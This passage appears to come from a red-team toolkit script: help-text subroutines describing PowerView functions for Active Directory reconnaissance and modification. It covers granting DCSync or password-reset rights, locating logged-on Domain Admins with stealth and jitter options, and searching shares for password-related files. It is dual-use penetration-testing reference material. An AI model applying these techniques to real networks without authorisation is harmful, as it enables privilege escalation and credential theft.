    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpadddomainobjectacl {
    show_message("
Function:
    Add-DomainObjectAcl 

Description:
    This function modifies the ACL/ACE entries for a given Active Directory
    target object specified by -TargetIdentity. Available -Rights are
    'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
    rights GUID can be set with -RightsGUID. These rights are granted on the target
    object for the specified -PrincipalIdentity.

Parameters:
    TargetIdentity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    TargetDomain: Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
    TargetLDAPFilter: Specifies an LDAP query string that is used to filter Active Directory object targets.
    TargetSearchBase: The LDAP source to search through for targets, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    PrincipalIdentity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    PrincipalDomain: Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Rights: Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
    RightsGUID: Manual GUID representing the right to add to the target.");
}

sub helpfindinterestingdomainacl {
    show_message("
Function:
    Find-InterestingDomainAcl 

Description:
    This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
    and for each returned ACE entry it checks if principal security identifier
    is *-1000 (meaning the account is not built in), and also checks if the rights for
    the ACE mean the object can be modified by the principal. If these conditions are met,
    then the security identifier SID is translated, the domain object is retrieved, and
    additional IdentityReference* information is appended to the output object.

Parameters
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    ResolveGUIDs: Switch. Resolve GUIDs to their display names.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainou {
    show_message("
Function:
    Get-DomainOU

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties whencreated,usnchanged,...'. By default, all OU objects for
    the current domain are returned.

Parameters:
    Identity: An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
    GPLink: Only return OUs with the specified GUID in their gplink property.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    FindOne: Only return one result object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpgetdomainsite {
    show_message("
Function:
    Get-DomainSite 
Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties whencreated,usnchanged,...'. By default, all site objects for
    the current domain are returned.

Parameters:
    Identity: An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
    GPLink: Only return sites with the specified GUID in their gplink property.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpgetdomainsubnet {
    show_message("
Function:
    Get-DomainSubnet 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties whencreated,usnchanged,...'. By default, all subnet objects for
    the current domain are returned.

Parameters:
    Identity: An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
    SiteName: Only return subnets from the specified SiteName.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpgetdomainsid {
    show_message("
Function:
    Get-DomainSID 

Description:
    Returns the SID for the current domain or the specified domain by executing
    Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
    to search for domain controllers through LDAP. The SID of the returned domain controller
    is then extracted.

Parameters:
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaingroup {
    show_message("
Function:
    Get-DomainGroup 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties samaccountname,usnchanged,...'. By default, all group objects for
    the current domain are returned. To return the groups a specific user/group is
    a part of, use -MemberIdentity X to execute token groups enumeration.

Parameters:
    Identity: A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
    MemberIdentity: A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
    AdminCount: Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
    GroupScope: Specifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for.
    GroupProperty: Specifies a specific property to search for when performing the group search.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpnewdomaingroup {
    show_message("
Function:
    New-DomainGroup 

Description:
    First binds to the specified domain context using Get-PrincipalContext.
    The bound domain context is then used to create a new
    DirectoryServices.AccountManagement.GroupPrincipal with the specified
    group properties.

Parameters:
    SamAccountName: Specifies the Security Account Manager (SAM) account name of the group to create.
    Name: Specifies the name of the group to create. If not provided, defaults to SamAccountName.
    DisplayName: Specifies the display name of the group to create. If not provided, defaults to SamAccountName.
    Description: Specifies the description of the group to create.
    Domain: Specifies the domain to use to search for user/group principals, defaults to the current domain.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainmanagedsecuritygroup {
    show_message("
Function:
    Get-DomainManagedSecurityGroup 

Description:
    Authority to manipulate the group membership of AD security groups and distribution groups
    can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
    used to delegate management authority to distribution groups, but Windows supports security groups
    being managed in the same way.
    This function searches for AD groups which have a group manager set, and determines whether that
    user can manipulate group membership. This could be a useful method of horizontal privilege
    escalation, especially if the manager can manipulate the membership of a privileged group.

Parameters:
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaingroupmember {
    show_message("
Function:
    Get-DomainGroupMember 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for the specified
    group matching the criteria. Each result is then rebound and the full user
    or group object is returned.

Parameters:
    Identity: A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    Recurse: Switch. If the group member is a group, recursively try to query its members as well.
    RecurseUsingMatchingRule: Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpadddomaingroupmember {
    show_message("
Function:
    Add-DomainGroupMember 

Description:
    First binds to the specified domain context using Get-PrincipalContext.
    The bound domain context is then used to search for the specified -GroupIdentity,
    which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For
    each entry in -Members, each member identity is similarly searched for and added
    to the group.

Parameters:
    Identity: A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
    Members: One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName
    Domain: Specifies the domain to use to search for user/group principals, defaults to the current domain.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainfileserver {
    show_message("
Function:
    Get-DomainFileServer 

Description:
    Returns a list of likely fileservers by searching for all users in Active Directory
    with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
    the server names.

Parameters:
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaindfsshare {
    show_message("
Function:
    Get-DomainDFSShare 

Description:
    This function searches for all distributed file systems (either version
    1, 2, or both depending on -Version X) by searching for domain objects
    matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
    The server data is parsed appropriately and returned.

Parameters:
    Domain: Specifies the domains to use for the query, defaults to the current domain.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaingpo {
    show_message("
Function:
    Get-DomainGPO 

Description:
    Builds a directory searcher object using Get-DomainSearcher, builds a custom
    LDAP filter based on targeting/filter parameters, and searches for all objects
    matching the criteria. To only return specific properties, use
    '-Properties samaccountname,usnchanged,...'. By default, all GPO objects for
    the current domain are returned. To enumerate all GPOs that are applied to
    a particular machine, use -ComputerName X.

Parameters:
    Identity: A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
    ComputerIdentity: Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
    UserIdentity: Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    Properties: Specifies the properties of the output object to retrieve from the server.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    SecurityMasks: Specifies an option for examining security information of a directory object.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    FindOne: Only return one result object.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    Raw: Switch. Return raw results instead of translating the fields into a custom PSObject.");
}

sub helpgetdomaingpolocalgroup {
    show_message("
Function:
    Get-DomainGPOLocalGroup 

Description:
    First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
    arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
    group membership is set through Group Policy Preferences groups.xml files. For any
    GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
    section data is processed if present. Any found Groups.xml files are parsed with
    Get-GroupsXML and those memberships are returned as well.

Parameters:
    Identity: A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
    ResolveMembersToSIDs: Switch. Indicates that any member names should be resolved to their domain SIDs.
    Domain: Specifies the domain to use for the query, defaults to the current domain.
    LDAPFilter: Specifies an LDAP query string that is used to filter Active Directory objects.
    SearchBase: The LDAP source to search through, e.g. 'LDAP://OU=secret,DC=testlab,DC=local'
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaingpouserlocalgroupmapping {
    show_message("
Function:
    Get-DomainGPOUserLocalGroupMapping 

Description:
    Takes a user/group name and optional domain, and determines the computers in the domain
    the user/group has local admin (or RDP) rights to.
    It does this by:
        1.  resolving the user/group to its proper SID
        2.  enumerating all groups the user/group is a current part of
            and extracting all target SIDs to build a target SID list
        3.  pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
            Get-DomainGPOLocalGroup
        4.  matching the target SID list to the queried GPO SID list
            to enumerate all GPO the user is effectively applied with
        5.  enumerating all OUs and sites and applicable GPO GUIs are
            applied to through gplink enumerating
        6.  querying for all computers under the given OUs or sites
    If no user/group is specified, all user/group -> machine mappings discovered through
    GPO relationships are returned.

Parameters:
    Identity: A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
    LocalGroup: The local group to check access against.
    Domain: Specifies the domain to enumerate GPOs for, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomaingpocomputerlocalgroupmapping {
    show_message("
Function:
    Get-DomainGPOComputerLocalGroupMapping 

Description:
    This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
    are in the specified local group for a target machine through GPO correlation.
    If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
    determine the OU the computer is a part of. Then resolve the computer's site name with
    Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to
    enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For
    each resulting GPO group, resolve the resulting user/group name to a full AD object and
    return the results. This will return the domain objects that are members of the specified
    -LocalGroup for the given computer.
    Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
    localgroup specifications.

Parameters:
    ComputerIdentity: A SamAccountName (e.g. WINDOWS10\$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
    OUIdentity: An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
    LocalGroup: The local group to check access against.
    Domain: Specifies the domain to enumerate GPOs for, defaults to the current domain.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetdomainpolicydata {
    show_message("
Function:
    Get-DomainPolicyData 

Description:
    Returns the default domain policy or the domain controller policy for the current
    domain or a specified domain/domain controller using Get-DomainGPO.

Parameters:
    Domain: The domain to query for default policies, defaults to the current domain.
    Policy: Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetlocalgroup {
    show_message("
Function:
    Get-NetLocalGroup 

Description:
    This function will enumerate the names and descriptions for the
    local groups on the current, or remote, machine. By default, the Win32 API
    call NetLocalGroupEnum will be used (for speed). Specifying '-Method WinNT'
    causes the WinNT service provider to be used instead, which returns group
    SIDs along with the group names and descriptions/comments.

Parameters:
    ComputerName: Specifies the hostname to query for sessions (also accepts IP addresses).
    Method: The collection method to use, defaults to 'API', also accepts 'WinNT'.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetlocalgroupmember {
    show_message("
Function:
    Get-NetLocalGroupMember 

Description:
    This function will enumerate the members of a specified local group  on the
    current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers
    will be used (for speed). Specifying '-Method WinNT' causes the WinNT service provider
    to be used instead, which returns a larger amount of information.

Parameters:
    ComputerName: Specifies the hostname to query for sessions (also accepts IP addresses).
    GroupName: The local group name to query for users. If not given, it defaults to 'Administrators'.
    Method: The collection method to use, defaults to 'API', also accepts 'WinNT'.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetshare {
    show_message("
Function:
    Get-NetShare 

Description:
    This function will execute the NetShareEnum Win32API call to query
    a given host for open shares. This is a replacement for 'net share \\\\hostname'.

Parameters:
    ComputerName: Specifies the hostname to query for shares (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetloggedon {
    show_message("
Function:
    Get-NetLoggedon 

Description:
    This function will execute the NetWkstaUserEnum Win32API call to query
    a given host for actively logged on users.

Parameters:
    ComputerName: Specifies the hostname to query for logged on users (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetsession {
    show_message("
Function:
    Get-NetSession 

Description:
    This function will execute the NetSessionEnum Win32API call to query
    a given host for active sessions.

Parameters:
    ComputerName: Specifies the hostname to query for sessions (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetregloggedon {
    show_message("
Function:
    Get-RegLoggedOn 

Description:
    This function will query the HKU registry values to retrieve the local
    logged on users SID and then attempt and reverse it.
    Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
    using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
    required (NetWkstaUserEnum requires remote admin access).

Parameters:
    ComputerName: Specifies the hostname to query for remote registry values (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetrdpsession {
    show_message("
Function:
    Get-NetRDPSession 

Description:
    This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
    Win32API calls to query a given RDP remote service for active sessions and originating
    IPs. This is a replacement for qwinsta.

Parameters:
    ComputerName: Specifies the hostname to query for active sessions (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helptestadminaccess {
    show_message("
Function:
    Test-AdminAccess 

Description:
    This function will use the OpenSCManagerW Win32API call to establish
    a handle to the remote host. If this succeeds, the current user context
    has local administrator acess to the target.

Parameters:
    ComputerName: Specifies the hostname to check for local admin access (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetnetcomputersitename {
    show_message("
Function:
    Get-NetComputerSiteName 

Description:
    This function will use the DsGetSiteName Win32API call to look up the
    name of the site where a specified computer resides.

Parameters:
    ComputerName: Specifies the hostname to check the site for (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetwmiregproxy {
    show_message("
Function:
    Get-WMIRegProxy 

Description:
    Enumerates the proxy server and WPAD specification for the current user
    on the local machine (default), or a machine specified with -ComputerName.
    It does this by enumerating settings from
    HKU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings.

Parameters:
    ComputerName: Specifies the system to enumerate proxy settings on. Defaults to the local host.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetwmireglastloggedon {
    show_message("
Function:
    Get-WMIRegLastLoggedOn 

Description:
    This function uses remote registry to enumerate the LastLoggedOnUser registry key
    for the local (or remote) machine.

Parameters:
    ComputerName: Specifies the hostname to query for remote registry values (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetwmiregcachedrdpconnection {
    show_message("
Function:
    Get-WMIRegCachedRDPConnection 

Description:
    Uses remote registry functionality to query all entries for the
    'Windows Remote Desktop Connection Client' on a machine, separated by
    user and target server.

Parameters:
    ComputerName: Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetwmiregmounteddrive {
    show_message("
Function:
    Get-WMIRegMountedDrive 

Description:
    Uses remote registry functionality to enumerate recently mounted network drives.

Parameters:
    ComputerName: Specifies the hostname to query for mounted drive information (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpgetwmiprocess {
    show_message("
Function:
    Get-WMIProcess 

Description:
    Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
    including the owners of the particular process.

Parameters:
    ComputerName: Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpfindinterestingfile {
    show_message("
Function:
    Find-InterestingFile 

Description:
    This function recursively searches a given UNC path for files with
    specific keywords in the name (default of pass, sensitive, secret, admin,
    login and unattend*.xml). By default, hidden files/folders are included
    in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
    is used to temporarily map the remote share.

Parameters:
    Path: UNC/local path to recursively search.
    Include: Only return files/folders that match the specified array of strings,
    LastAccessTime: Only return files with a LastAccessTime greater than this date value.
    LastWriteTime: Only return files with a LastWriteTime greater than this date value.
    CreationTime: Only return files with a CreationTime greater than this date value.
    OfficeDocs: Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
    FreshEXEs: Switch. Find .EXEs accessed within the last 7 days.
    ExcludeFolders: Switch. Exclude folders from the search results.
    ExcludeHidden: Switch. Exclude hidden files and folders from the search results.
    CheckWriteAccess: Switch. Only returns files the current user has write access to.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials");
}

sub helpfinddomainuserlocation {
    show_message("
Function:
    Find-DomainUserLocation 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and queries the domain for users of a specified group
    (default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
    function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
    The found user list is compared against the target list, and any matches are
    displayed. If -ShowAll is specified, all results are displayed instead of
    the filtered set. If -Stealth is specified, then likely highly-trafficed servers
    are enumerated with Get-DomainFileServer/Get-DomainController, and session
    enumeration is executed only against those servers. If -Credential is passed,
    then Invoke-UserImpersonation is used to impersonate the specified user
    before enumeration, reverting after with Invoke-RevertToSelf.

Parameters:
    ComputerName: Specifies an array of one or more hosts to enumerate, passable on the pipeline.
    Domain: Specifies the domain to query for computers AND users, defaults to the current domain.
    ComputerDomain: Specifies the domain to query for computers, defaults to the current domain.
    ComputerLDAPFilter: Specifies an LDAP query string that is used to search for computer objects.
    ComputerSearchBase: Specifies the LDAP source to search through for computers,
    ComputerUnconstrained: Switch. Search computer objects that have unconstrained delegation.
    ComputerOperatingSystem: Search computers with a specific operating system, wildcards accepted.
    ComputerServicePack: Search computers with a specific service pack, wildcards accepted.
    ComputerSiteName: Search computers in the specific AD Site name, wildcards accepted.
    UserIdentity: Specifies one or more user identities to search for.
    UserDomain: Specifies the domain to query for users to search for, defaults to the current domain.
    UserLDAPFilter: Specifies an LDAP query string that is used to search for target users.
    UserSearchBase: Specifies the LDAP source to search through for target users.
    UserGroupIdentity: Specifies a group identity to query for target users, defaults to 'Domain Admins.
    UserAdminCount: Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
    UserAllowDelegation: Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
    CheckAccess: Switch. Check if the current user has local admin access to computers where target users are found.
    Server: Specifies an Active Directory server (domain controller) to bind to.
    SearchScope: Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
    ResultPageSize: Specifies the PageSize to set for the LDAP searcher object.
    ServerTimeLimit: Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
    Tombstone: Switch. Specifies that the searcher should also return deleted/tombstoned objects.
    Credential: A [Management.Automation.PSCredential] object of alternate credentials
    StopOnSuccess: Switch. Stop hunting after finding after finding a target user.
    Delay: Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
    Jitter: Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
    ShowAll: Switch. Return all user location results instead of filtering based on target
    Stealth: Switch. Only enumerate sessions from connonly used target servers.
    StealthSource: The source of target servers to use, 'DFS' (distributed file servers),
    Threads: The number of threads to use for user searching, defaults to 20.")
}

sub helpfinddomainprocess {
    show_message("
Function:
    Find-DomainProcess 

Description:
    This function enumerates all machines on the current (or specified) domain
    using Get-DomainComputer, and queries the domain for users of a specified group
    (default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
    function enumerates any current processes running with Get-WMIProcess,
    searching for processes running under any target user contexts or with the
    specified -ProcessName. If -Credential is passed, it is passed through to
    the underlying WMI commands used to enumerate the remote machines.

Parameters:
